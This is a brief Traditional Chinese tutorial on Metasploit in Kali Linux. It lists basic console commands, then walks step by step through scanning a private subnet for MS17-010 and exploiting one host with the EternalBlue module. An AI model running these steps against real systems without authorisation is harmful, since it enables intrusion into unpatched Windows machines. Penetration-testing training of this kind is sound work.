Kali Linux - Metasploit 使用方法

1.更新metasploit版本
apt-get update
apt-get install metasploit-framework

2.開啟Metasploit
msfconsole

3.常用指令說明
help：檢視執行指令的資訊
search module：搜尋特定模組
use module：載入特定模組
info：查訊目前使用模組的資訊
options：查看需要設定的參數
set option module：設定模組內的參數
check：測試
run：執行滲透攻擊模組
back：回到上層

範例 - 攻擊Microsoft的MS17_010漏洞

search ms17_010

a.大範圍搜索攻擊目標
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS 192.168.33.1/24
set THREADS 16
run

 

b.攻擊特定目標
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOST 192.168.33.106
RUN

c.滲透成功
ipconfig
whoami